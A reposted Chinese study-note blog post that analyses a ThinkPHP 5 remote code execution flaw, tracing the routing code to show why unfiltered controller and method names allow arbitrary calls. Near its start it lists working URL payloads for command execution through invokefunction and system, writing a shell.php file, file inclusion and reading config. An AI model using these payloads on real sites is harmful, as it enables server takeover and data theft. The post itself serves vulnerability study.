文章详情

短信预约-IT技能 免费直播动态提醒

请输入下面的图形验证码

提交验证

短信预约提醒成功

学习笔记-ThinkPHP5漏洞分析之代码执行(七)

2023-09-01 15:22

关注

参考链接:Mochazz/ThinkPHP-Vuln/

影响版本:5.0.7<=ThinkPHP5<=5.0.22 、5.1.0<=ThinkPHP<=5.1.30

测试环境:PHP7.3.4、Mysql5.7.26、TP5.0.18

5.1.x

?s=index/\think\Request/input&filter[]=system&data=pwd
?s=index/\think\view\driver\Php/display&content=
?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=
?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

5.0.x

?s=index/think\config/get&name=database.username # 获取配置信息
?s=index/\think\Lang/load&file=../../test.jpg # 包含任意文件
?s=index/\think\Config/load&file=../../t.php # 包含任意.php文件
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

本文以?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

为例。

相信很多人在不懂原理的情况下,看这一串payload是感觉很nb的一个paylaod(因为它长,需要的参数多),像我本人之前就纳闷这payload中为啥还会有反斜杠,s参数名是啥?invokefunction是啥?这个think。可是当时只看得懂system(whoami)😂。接下来就从代码中找到这些答案。

==只想看结果请直接跳到:==

0x00 从?s=是个啥开始

在application.php#78行,有一个var_pathinfo键的值默认就是s,而该项的注释是PATHINFO变量名 用于兼容模式。那么什么是PATHINFO?什么是兼容模式?

在源码中遇到不知道的定义,大可以全局搜索它在哪里定义,哪里用到了它:

image-20220419160647401

image-20220419160647401

来到thinkphp.php#pathinfo()来阅读var_pathinfo的使用。

image-20220419161105887

image-20220419161105887

可以看到在390行用Config::get获取了var_pathinfo的值,也就是s,然后就变成了`$_GET[s],获取到值赋值给$_SERVER['PATH_INFO'],然后下面407行去除了最左边的正斜杠。那么现在就明白了。s就是用来获取payload中的index/\think\app/invokefunction这部分的,它也叫做兼容模式参数,而它的值在tp里面就作为pathinfo。pathinfo后来又会怎么处理呢?继续跟着程序执行流程

在thinkphp.php#check()

image-20220419162000264

image-20220419162000264

其中,$url实际上传入的就是刚才的pathinfo的值。注意到839行把所有的/都替换为了|。那么现在就是

index|\think\app|invokefunction这个样子。但是因为没有定义好的路由规则,最后还是return了false。在thinkphp.php#642:

image-20220419162556069

image-20220419162556069

可以看到,如果没有定义好路由规则,也就是刚才的return了false,并且还有强制路由的话就会抛出错误。但是这个漏洞利用条件之一就是不开启强制路由~。

那么再往下走,就会到thinkphp.php#parseUrl来解析那个pathinfo。我想这应该就是所谓的兼容模式了。

0x01 模型/控制器/方法的处理

在parseUrl方法中也会把正斜杠替换为|来处理index/\think\app/invokefunction(为了方便下面以url替换这串)

但是与之前的check方法不同的是,它紧接着调用了parseUrlPath()方法。

image-20220419163335378

image-20220419163335378

在parseUrlPath()方法中,用$path = explode('/', $url);来把这个url给处理为了一个数组。:

image-20220419163613050

image-20220419163613050

这样实际上就是分成了模型、控制器、方法了。最终逐个获取的位置是parseUrl方法的:

image-202204191638582050x02 漏洞原因

当程序执行到thinkphp.php#exec(),会进入到module分支,来到module方法,在:

image-20220419164634285

image-20220419164634285

这里的path数组”,

image-20220419163613050

image-20220419163613050

1=>控制器,2=>操作名(也叫做方法名)。在这里获取了之后,程序没有再对控制器、方法名过滤导致了任意控制器下任意方法的调用。(但实际上并不是很任意。。)

紧接着就会使用加载器

$instance = Loader::controller(
$controller,
$config['url_controller_layer'],
$config['controller_suffix'],
$config['empty_controller']
);

加载,在thinkphp.php#controller

image-20220419165203092

image-20220419165203092

然后在invokeClass方法中:

image-20220419165256848

image-20220419165256848

使用反射来获取了think?句柄?反正$reflect现在已经代表这个类了。 。。然后用:

image-20220419165635171

image-20220419165635171

来实例化。,返回到了$instance变量中,这时控制器这块已经基本上处理完了,think.php这个php文件里的App类(在MVC架构中,某些类也是可以叫做控制器),think是一个命名空间。意思就是think命名空间下的都是thinkphp的核心代码。命名空间的概念百度一下就知道了。

接下来就是获取方法,调用反射执行类的方法。App类里的invokefunction方法如下:


public static function invokeFunction($function, $vars = [])
{
$reflect = new \ReflectionFunction($function);
$args = self::bindParams($reflect, $vars);
// 记录执行信息
self::$debug && Log::record('[ RUN ] ' . $reflect->__toString(), 'info');
return $reflect->invokeArgs($args);
}

最后return的时候调用了invokeArgs,在手册中解释如下:

image-20220419171539267

image-20220419171539267

很明确它是能调用带参函数的。

总体流程如下:使用反射执行了App里的invokeFunction,并给其传入了参数1:function=call_user_func_array,参数2:vars[]=system&vars[1][]=whoami。

它会执行call_user_func_array('system', ['whoami']),也就是system(‘whoami’)。执行了命令。

0x03 参数的获取?

使用的是bindParams方法获取的参数,参数名必须还得是这特定值,为啥呢?

因为bindParams方法中会用getParameters(ReflectionFunctionAbstract::getParameters)获取反射对象的每一个参数,返回参数列表。

来源地址:https://blog.csdn.net/sinat_35360663/article/details/127775239

阅读原文内容投诉

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

软考中级精品资料免费领

  • 历年真题答案解析
  • 备考技巧名师总结
  • 高频考点精准押题
  • 2024年上半年信息系统项目管理师第二批次真题及答案解析(完整版)

    难度     813人已做
    查看
  • 【考后总结】2024年5月26日信息系统项目管理师第2批次考情分析

    难度     354人已做
    查看
  • 【考后总结】2024年5月25日信息系统项目管理师第1批次考情分析

    难度     318人已做
    查看
  • 2024年上半年软考高项第一、二批次真题考点汇总(完整版)

    难度     435人已做
    查看
  • 2024年上半年系统架构设计师考试综合知识真题

    难度     224人已做
    查看

相关文章

发现更多好内容

猜你喜欢

AI推送时光机
位置:首页-资讯-后端开发
咦!没有更多了?去看看其它编程学习网 内容吧
首页课程
资料下载
问答资讯